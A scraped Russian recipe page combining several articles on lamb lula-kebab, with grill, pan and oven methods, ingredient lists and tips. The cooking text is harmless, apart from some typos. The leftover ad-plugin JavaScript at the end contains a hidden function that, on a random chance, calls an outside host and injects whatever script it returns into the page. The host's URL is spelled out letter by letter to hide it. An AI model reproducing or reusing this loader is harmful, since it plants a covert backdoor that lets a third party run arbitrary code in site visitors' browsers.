Люля-кебаб из баранины

Люля кебаб из баранины на мангале, сковороде и в духовке: тонкости приготовления, ингредиенты, пошаговая инструкция

Люля-кебаб – популярное во всем мире блюдо. Традиционно для приготовления используется баранина или говядина. Не всем нравится вкус баранины, однако если ее приготовить правильно, получится ароматное блюдо, способное удовлетворить даже самого взыскательного гурмана.

Восточное угощение можно легко сделать в домашних условиях, используя при этом разные способы приготовления.

Тонкости приготовления люля-кебаба из баранины

Традиционное блюдо Востока — люля-кебаб — готовят из баранины или ягнятины. Так как баранина имеет специфический вкус и запах, то при приготовлении нужно соблюсти ряд условий. Благодаря которым блюдо получится по-настоящему вкусным и ароматным.

Если будете в Стамбуле, то советую посетить кафе… оно работает с 1867 года ! Называется Iskender. Выбрала его из-за большого количества людей. И не прогадала. Меня даже не спрашивали, что я буду..принесли Кебаб из баранины с соусом. Снизу был хлеб и овощи . Вкуснятина нереальная . Но такое блюдо лучше брать одно на двоих

этап особенности
выбор продуктов Секрет приготовления блюда заключается в хорошем мясе. Баранина должна быть свежей, хорошо выделанной. Не рекомендуется использовать размороженный продукт.
подготовка Мясо следует порубить с помощью специальных ножей-топориков. При прокручивании фарша в мясорубке ставится насадка с большими отверстиями.
дополнительные компоненты Традиционной добавкой к мясу является мелко нарезанное курдючное сало. Его можно заменить на свиное.

Лук измельчаеют только ножом (не в блендере).

приправы В качестве ароматизатора используется только черный перец.

Можно добавить в фарш кинзу, зиру, кориандр.

Фарш необходимо хорошо вымесить в течение 15-20 минут. Длительное замешивание делает фарш плотнее, что упростит формирование котлет.

Турецкие повара заранее делают заготовки из хорошо охлажденного фарша. Для этого смесь из нарубленного мяса и сала нужно подержать несколько часов (а лучше в течение ночи) в холодильнике.

Люля-кебаб из баранины: ингредиенты на 4 порции

В оригинальном рецепте кебаб готовится из баранины. При желании ее можно заменить говядиной или телятиной.

Для приготовления 4-х порций потребуется:

  • 800 г бараньей вырезки;
  • 1-2 крупных луковицы;
  • 150 г жира (курдючного);
  • 0,5 ч. л. зиры;
  • кинза по вкусу;
  • соль;
  • черный перец свежего помола.

К готовому блюду обычно подают маринованный лук. Готовится он быстро, в течение 25-30 минут.

Для маринада используется:

  • 50 мл холодной кипяченой воды;
  • 2 ст. л. яблочного или виноградного уксуса;
  • 1 ч. л. сахара.

Для сервировки используют свежие овощи и зелень. Вместе с блюдом подается хлеб (лаваш или матнакаш).

Люля-кебаб из баранины: пошаговая инструкция

Приготовление люля-кебаб требует определенной сноровки и кулинарного опыта. Процесс заготовки, охлаждения сырья, формирования котлет и обжарки занимает несколько часов.

Кебаб – блюдо жирное и калорийное. В 100 граммах блюда содержится примерно 480-490 Ккал.

  1. Тщательно вымытая мякоть мелко рубится, смешивается с нарезанным кусочками жиром и луком.
  2. Добавляется мелко нарубленная кинза, специи.
  3. Вымешивается фарш. Убирается в холодильник на 2-3 ч.
  4. Из охлажденного сырья формируются длинные колбаски, нанизываются на деревянные или металлическиешампуры или шпажки.
  5. Заготовка обжаривается на мангале, на сковороде или в духовом шкафу.

Люля-кебаб из баранины на мангале

Приготовленный на открытом огне люля-кебаб популярен во всем море. Во многих странах это блюдо называют шашлык.

Состав:

  • 1 кг ягнятины или баранины;
  • 3 луковицы;
  • 250 г курдючного сала;
  • соль;
  • приправы по вкусу.

Описание:

  1. Мясо нарезать маленькими кусочками или пропустить через мясорубку. Соединить с измельченным салом.
  2. Лук мелко нарубить острым ножом, добавить к мясу.
  3. Добавить специи,
  4. Полученную массу хорошо перемешать, убрать в холод на 2 часа.
  5. Сформировать продолговатые колбаски, которые насадить на деревянные или металлические шампуры.
  6. Равномерно обжарить на углях.
  7. При подаче сервировать овощами и зеленью.

Люля-кебаб из баранины на сковороде

Приготовить кебаб можно и на кухне. Для приготовления используются шампуры из дерева. Колбаски обжариваются в небольшом количестве растительного масла на сковороде.

Ингредиенты:

  • 1,5 кг баранины;
  • 300 г жира или сала (курдючного);
  • 3 большие луковицы;
  • пряности (кинза, кориандр, зира);
  • 4-5 долек чеснока;
  • черный молотый перец;
  • соль по вкусу.

Этапы готовки:

  1. Смешать мелко нарубленное мясо, рубленный лук, измельченное сало, пропущенный через пресс чеснок.
  2. Добавить приправы, замесить фарш.
  3. Фарш охладить в течение часа.
  4. Сформировать котлеты, нанизать на деревянные шпажки.
  5. Жарить на раскаленной сковороде в небольшом количестве масла до появления золотистой корочки.

Люля-кебаб из баранины в духовке

Запеченный в духовке шашлык считается самым «здоровым» вариантом приготовления. При этом можно не использовать деревянные шпажки или маленькие шампуры, а просто выложить котлеты на решетку, поместив снизу противень (для стекания жира).

Компоненты;

  • 1 кг мяса;
  • 150-200 г курдючного сала;
  • 2 луковицы;
  • 2-3 дольки чеснока;
  • приправы по вкусу.

Описание.

  1. Мясо и жир измельчить или прокрутить в мясорубке.
  2. Нарезать небольшими кусочками лук.
  3. Пропустить через пресс чеснок.
  4. Все перемешать, посолить, добавить приправы по вкусу.
  5. Убрать фарш в холодильник на 60-90 мин.
  6. Из охлажденной массы сделать длинные колбаски. Можно нанизать их на шпажки.
  7. Разложить на выстеленный фольгой противень или на решетку для гриля.
  8. Запекать при температуре 190°С до появления румяной корочки.
  9. Подавать с лавашом, овощами и зеленью.

Заключение

Разные способы приготовления традиционного люля-кебаб каждый раз позволят придать готовому блюду новые оттенки вкуса. Люля-кебаба необязательно жарить только на мангале. Приготовленное на домашней кухне блюдо получается ни чуть не хуже.

Несмотря на то, что в качестве главного компонента используется бараниа, можно взять любое мясо. Но все же именно классический набор ингредиентов придает изделию изюминку и неповторимый восточный колорит. Главное – внимательно отнестись к выбору продуктов и готовить люля-кебаб по правилам.

Тогда получившееся в результате блюдо придется по душе всем и станет настоящим украшением не только повседневного, но и праздничного стола.

Люля-кебаб из баранины в духовке — 5 рецептов приготовления в домашних условиях

Здравствуйте, дорогие друзья! Продолжая мясную тему, хочется отметить отдельно люля-кебаб из баранины, ведь это самый что ни на есть традиционный продукт. Именно барашек служил вкуснейшей основой, даря нежные ощущения и своеобразный вкусовой оттенок.

Конечно же, главное, на что стоит обратить внимание, если вы берете цельные куски мяса, то это цвет волокон и возраст животного. В идеале мяско должно быть розовое. Чем темнее цвет, тем выше возраст барана. После того, как совершите покупку, советую срезать жировые излишки, из-за них может проявиться неприятный запах.

Кстати, друзья! В прошлом выпуске делилась с вами рецептами приготовления люля из говядины. Если интересно, то можете посмотреть здесь.

Огромный плюс этого блюда заключается в том, что с ним изумительно сочетаются абсолютно любые приправы и специи. Вы можете фантазировать и экспериментировать как угодно, результат вас не огорчит. Ну а теперь предлагаю перейти к самим рецептам. Вперед!

Люля-кебаб из баранины в духовке по самому лучшему рецепту

Лучшим он называется не просто так, заметьте. Результат поразит всех и каждого. Настоятельно рекомендую начать его реализацию как можно скорее.

Ингредиенты:

  • мясо барана — 1,5 кг;
  • жир или сало — 200 грамм;
  • соль поваренная — 25 грамм;
  • смесь перцев — 10-13 грамм;
  • зира и кинза молотые — по 8 грамм;
  • чесночок — 3 крупных зубчика;
  • лук репчатый — 2 больших луковицы.

Приготовление:
1. Порежьте мясо на небольшие кусочки. Такими же квадратиками нарежьте жировой ломтик. Добавьте соли и специй, порубите чеснок и лук полукольцами. Все хорошенечко перемешайте в одной глубокой емкости.

Уберите мариноваться в холодильник на 1,5-2 часика.

2. Спустя обозначенное время пропустите эту смесь через мясорубку с крупной решеткой. Дайте постоять еще минут 15 и начинайте вылепливать форму.

3. Не делайте ее слишком широкой или очень узкой. Застелите противень фольгой, расположите люляшки и уберите в духовку на 25 минут при температуре 190 градусов. Как только будет готово, то выкладывайте на стол. И вкуснее есть тогда, пока они не остыли. Приятного аппетита!

Как приготовить люля-кебаб из бараньего фарша в домашних условиях

Изготавливать вкусные люляшки дома не так трудно, всего лишь стоит начать. Как говорится, практика и еще раз практика! Скажу честно, восхитить родных удастся уже с первого раза. Уникальность рецепта состоит в простоте — его без проблем можно реализовать на сковородке.

Ингредиенты:

  • фаршик бараний — 800 грамм;
  • зелень-петрушка — небольшой пучок;
  • лук репчатый — одна большая головка;
  • перчик горошком — 6-8 штучек;
  • соль поваренная — по вкусу;
  • масло растительного происхождения — 1 чайная ложечка;
  • зира — половина столовой ложки.

Приготовление:
1. Очистите лучок от шелухи и порежьте на кубики среднего размера. Добавьте его к фаршу. Также порубите зелень и перевалите туда же.
2. Намочите руки для того, чтобы фарш не прилипал и лучше держал форму. Начинайте лепить аккуратную продолговатые котлетки. Отправьте их в морозильную камеру на 5-10 минуток.


3. Поставьте сковороду на огонь и добавьте растительного маслица. Достаньте кебабы из морозилки и закладывайте в емкость на плите.

4. Следите за тем, чтобы продукция не пригорела. Как только поджарится одна сторона — переверните. В среднем они прожариваются за 8-10 минут. После приготовления можете нарезать овощей или кушать с любым гарниром.

Рецепт бараньего люля-кебаба без шпажек

Вкусные люляшки вполне можно готовить из без накалывания на шпажку, вам просто нужно аккуратно всё сформировать руками. Задача несложная, поэтому не переживайте. А еще рецепт можно прекрасно воплощать в аэрогриле.

Ингредиенты:

  • баранье мяско — 1200 грамм;
  • курдюк — 180 грамм;
  • перцы молотые (черный, красный, белый) — 25 грамм;
  • соль пищевая — по вкусу, ориентировочно 30 грамм;
  • чесночные зубчики — 4 штучки;
  • лук-репка — 1,5 крупных головки;
  • кориандр — 1 чайная ложечка;
  • зира — одна столовая ложка.

Приготовление:
1. Нарежьте мясо и курдюк на небольшие квадратики и перемолите их через мясорубку. Добавьте приправы и перемешайте мясо руками.

Оставьте на полчасика в холодильнике.

2. Пока фарш охлаждается, измельчите лук. Его следует закладывать в мясную смесь прямо перед лепкой, так как он выделяет достаточно сока. Соедините все элементы и принимайтесь к формированию.

3. Особенность приготовления состоит в том, что готовится они будут в аэрогриле. В этом нет ничего страшного, рецепт подходит и для духовых шкафов со сковородками.
После того, как колбаски будут слеплены, выложите их на решетку или противень, и поставьте на 25% при температуре 220 градусов. Как только выйдет указанное время, вытащите их и подавайте к столу.

Люляшки прекрасно сочетаются с овощами и лавашем, так как содержат достаточное количество жира.

Готовим люля-кебаб из баранины в духовке на шпажках

Любая еда на палочках вызывает наибольшей интерес, ведь это можно увидеть не так часто. Она прекрасно привлекает не только детей, но и взрослых. А еще люля на шпажках удобна в плане аккуратности, ведь будет удобно брать, сохраняя руки чистыми.

Ингредиенты:

  • фарш из баранины — 1 кг;
  • чесночок — 3 небольших зубчика;
  • луковица репчатая — 1 штука;
  • соль пищевая — 20 грамм;
  • молотый перец — по вкусу;
  • куркума — половина чайной ложечки;
  • карри — по желанию.

Приготовление:
1. Выложите фарш в глубокую емкость. На доске измельчите лучок квадратиками. Отправьте его к мясу и хорошенько перемешайте.
2. Очистите чесночные зубчики, порежьте их на полукольца и добавьте к общей массе. Присыпьте специями и приправами, перемешав еще раз.


3. Приготовьте шпажки, и сполосните руки. Это нужно для того, чтобы кусочки фарша не липли к пальцам. Возьмите в ладонь комочек фарша и распределяйте его прямо по палочке.

Старайтесь придать форму колбаске, но не переусердствуйте с толщиной. Если получится тонкой будет сухо.

4. Сложите сформировавшиеся кебабики в противень, промазанный маслом. Затем уберите в духовой шкаф на 25 минут с температурой 180 градусов.

5. Подавайте с зеленью и овощами. Приятного аппетита!

Видео о том, как сделать люля-кебаб из баранины

В этом видеорецепте вы узнаете о том, как приготовить потрясающую основу, а именно фарш, так, чтобы блюдо получилось великолепным. Предлагаю приступить к просмотру как можно скорее! А при желании можно даже делать заметки на бумаге.

На этом подвожу колонку к концу, и очень надеюсь, что вам понравился какой-нибудь рецептик из приведенных. Поделитесь своим мнением в комментариях, рассказывайте друзьям и, конечно же, ставьте лайки. Товарищи, готовьте с удовольствием и приятного всем аппетита!

Люля кебаб из баранины

Бесподобный вкус люля кебаб не оставит никого равнодушным. Сочные и остренькие, они станут желанным блюдом всех, кто любит сытно и вкусно трапезничать, красиво встретить гостей или пооригинальничать на природе. Универсальность люля еще и в том, что их можно готовить не только в сковороде, а и в духовке, в аэрогриле, микроволновке, на костре и пр. Люля-кебаб из баранины – это еще и очень полезно! Подаем люля-кебабы со сливовым соусом, с овощами и самыми разными гарнирами.

  1. Главная
  2. Лучшие рецепты
  3. Категории рецепта
  4. Люля кебаб из баранины

Ингредиенты и как готовить

ингредиенты на 2 порции или – количество продуктов для нужных вам порций будет подсчитано автоматически!’>

Всего:

Вес состава: 100 гр
Калорийность
состава:
267 ккал
Белков: 13 гр
Жиров: 24 гр
Углеводов: 1 гр
Б/Ж/У: 34 / 63 / 3
Н 100 / С 0 / В 0

Время приготовления: 55 мин

Пошаговое приготовление

Шаг 1:

Начнем, конечно же, с приготовлении фарша. Отделим нужное количество вымытого и уже просушенного мяса и сала. Обрежем все лишнее и нарежем баранину на кусочки, которые будут легко измельчаться в вашем приспособлении.

Шаг 2:

У меня есть прекрасная вещь, не требующая усилий – блендер. Я туда отправила мясо, а потом и кусочки жира.

Шаг 3:

Чтобы фарш не распался во время жарки, желательно его крепенько поколотить – побросайте его о стол, пару раз хватит.

Шаг 4:

Очищенный лук можно тоже промолоть, но! Во-первых, фарш на люля-кебаб должен быть фактурным. А, во-вторых, если еще и лук промолоть, то фарш приобретет более водянистую структуру. Поэтому мелко его нашинкуем.

Шаг 5:

То же самое проделаем и с зеленью – измельчим чуть ли не в пыль.

Шаг 6:

Отправим лук и зелень в фарш и перемешаем хорошо, приправим солью и чем-то остреньким фарш на люля-кебаб. Для этой цели подходят разные специи. Вымешиваем как можно дольше, т.е. минут 5-7.

Шаг 7:

Накрыв посудину с фаршем пищевой пленкой, подержим ее минут 30 в холодильнике, а потом вылепим небольшие колбаски.

Шаг 8:

Наденем эти колбаски на деревянные шпажки или шампуры, и жарим в хорошо раскаленном масле на сковороде, не забывая аккуратно переворачивать. Минут 15-20 хватит.

Следите за консистенцией фарша, добавляя в него остальные компоненты.

Старайтесь не делать ни жидковатым, иначе люля не поджарятся, а распадутся во время приготовления, ни густым, т.к. вряд ли они будут сочны.

Жарьте люля до румяной корочки, а доводить до готовности можно в духовке, нагретой до 180 градусов – четверти часа достаточно.

В фарш можно добавлять и другие пряности и специи, а также любимые овощи.

Руки перед формированием колбасок обмакиваем в масло – не так будет прилипать фарш.

Нанизывая колбаски на шпажки или шампуры, равномерно распределяйте его.

Перед жаркой на сковороде отрежьте деревянные шпажки по ее размерам.

Если жарка осуществляется на костре, то их надо нанизывать на железные шампуры.

Учтите, чем толще колбаски, тем дольше будет идти процесс жарки.

Любимое блюдо во всем мире: люля кебаб из баранины

Люля-кебаб – известное мясное блюдо во всех уголках мира, что представляет собой котлету овальной формы на шампуре, обжаренную на мангале.

Оно может быть разнообразным, причем в каждой стране его готовят по-разному, добавляя в рецепт приготовления что-то свое, уникальное и национальное.

В статье найдете подробное описание рецепта приготовления люля кебаб из баранины.

Описание

Классический люля- кебаб готовят из фарша баранины или мелко рубленого мяса.

Уникальность данного блюда состоит в том, что в мясной фарш не добавляют ни яиц, ни хлеба, чтобы скрепить его.

Однородность и вязкость фарша достигают особой рецептурой его “отбивания” и длительного смешивания не менее 10 минут. Это блюдо пришедшее из стран Закавказья и Ближнего Востока, сейчас популярное во всем мире.

Представляет оно собой один из видов шашлыка, но имеет специфический и нежный вкус.

Так что употреблять классический люля-кебаб можно даже тем, кто следит за своей фигурой.

Хозяйкам на заметку — разновидности кебаба: казан кебаб, с картошкой и др.
Фото люля кебаба:



Рецепт люля-кебаб из баранины

Время приготовления – 1 час 20 минут.

Уровень сложности – сложно.

Тип блюда – второе.

Порций – 5.

Калорийность люля кебаб из баранины – 489 ккал на 100 гр.

Инвентарь:

  • разделочная доска;
  • острый нож;
  • мясорубка;
  • блендер;
  • сковорода-гриль;
  • две глубоких миски;
  • деревянные шпажки;
  • сервировочные блюда.

Основные ингредиенты:

  1. Жирная свежая баранина – 1 кг.
  2. Курдючный жир – 200 гр.
  3. Свежая кинза –1 пучок.
  4. Черный молотый перец.
  5. Соль – 10 гр.
  6. Зира – половина чайной ложки.
  7. Оливковое масло – 2 столовые ложки.
  8. Репчатый лук – 2-3 штуки большого размера.
  9. Яблочный уксус – 20 мл.
  10. Кипяченая вода – 50 мл.
  11. Сахар – 1 чайная ложка.

Дополнительные ингредиенты:

  1. Сезонные овощи: огурцы, помидоры, сладкий перец.
  2. Листья салата.
  3. Лаваш.

Пошаговый рецепт люля кебаб в домашних условиях из баранины:

    Для начала нужно выбрать и подготовить мясо.

Мясо чистим от пленок и сухожилий, чтобы осталось лишь мясное филе, нарезаем его небольшими кусочками, измельчаем через крупную решетку мясорубки и кладем в глубокую миску.

  • Репчатый лук измельчаем на мелкие кубики с помощью ножа. Готовим сразу маринованный лук для подачи: нарезаем его кольцами и замачиваем в смеси яблочного уксусу и воды (1:1) с 1 ч. л. сахара и 1 ч. л. соли.
  • Пучок кинзы тщательно промываем под струей воды, стряхиваем и мелко рубим ножом.
  • Предварительно подмороженный курдючный жир достаем из морозильника и пропускаем через блендер. В таком виде его проще и легче измельчить.
  • Бросаем лук, зелень и жир к мясу, добавляем соль по вкусу и специи, затем все ингредиенты хорошенько перемешиваем.
  • Прежде чем приступить к приготовлению фарша, берем деревянные шпажки, на которых в будущем будем обжаривать люля и замачиваем их в воде минимум на 30 минут. Это предотвратит соскальзывание мясной смеси.
  • Мы подошли к самому важному этапу рецепта – смешиванию и отбиванию фарша. Это займет примерно 10-15 минут. Необходимо придать ему вязкость, ведь среди ингредиентов нет яиц и хлеба, которые обычно предупреждают разваливание обычных котлет. Берем фарш, месим его руками, захватываем в ладонь и периодически бросаем с высоты на разделочную доску или в глубокую емкость, чтобы мясные волокна разорвались и между ними образовалась воздушная прослойка. Тогда он не свалиться с шампура. Готовый фарш должен быть однородным, клейким и плотным, не содержать лишней влаги.
  • Накрываем емкость с фаршем пищевой пленкой, ставим в холодильник и выдерживаем 1 час. В охлажденном виде его будет проще одеть на шампур, благодаря застыванию жирового компонента, он будет плотно на нем сидеть.
  • Достаем деревянные шпажки с емкости с водой и одеваем на них охлажденный фарш. Для этого, формируем котлетки продолговатой формы и протыкаем их шпажкой. Чтобы фарш не прилипал к рукам, смачиваем руки теплой водой или оливковым маслом. Уплотняем место соединения мясного фарша и палочки.

    Мы будем готовить на сковороде, для этого концы мясной сосиски необходимо сузить.

  • Ставим сковороду-гриль на плиту, вливаем оливковое масло и кладем люля. Обжариваем на максимальном огне, периодически переворачивая с одной стороны на другую, до образования золотистой корочки и черных полос. Затем прикручиваем огонь до средней интенсивности, накрываем крышкой и томим в течение 10-15 минут.
  • Готовый люля-кебаб подают на сервировочных блюдах в горячем виде с лавашем, свежей зеленью и овощами, посыпая сверху кольцами маринованного лука.
  • Если вы освоите турецкую кухню, то не вам не составит труда приготовить любое блюдо: кебаб в духовке и даже сладости (рахат лукум, пахлава).

    Советы по приготовлению

  1. При выборе мяса, отдавайте предпочтение жирным кускам, так мясо прожарится и будет сочным.
  2. Ориентируйтесь на свежесть, для этого блюда подходит только свежее, а не ранее замороженное мясо.
  3. Следует обратить внимание, что в классическом рецепте мясо мелко рубиться специальными топориками, но если их нет, можно пропустить через крупную решетку мясорубки.

Очень вкусные блюда у турков из баклажан, попробуйте приготовить: бабагануш, по-турецки.

Как приготовить люля кебаб из баранины дома, смотрите на видео:

Заключение

Существует множество рецептов приготовления люля, стоит лишь посмотреть несколько из них, чтобы выбрать подходящие ингредиенты для домашнего приготовления. Без мангала на домашней кухне блюдо получится ничуть не хуже. Необходимо придерживаться общей рецептуры блюда, а главное не испортить его на финише, когда нужно сформировать колбаски на палочке.

Всем известны такие напитки, как кофе по-турецки и айран, смело готовьте и радуйте близких.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};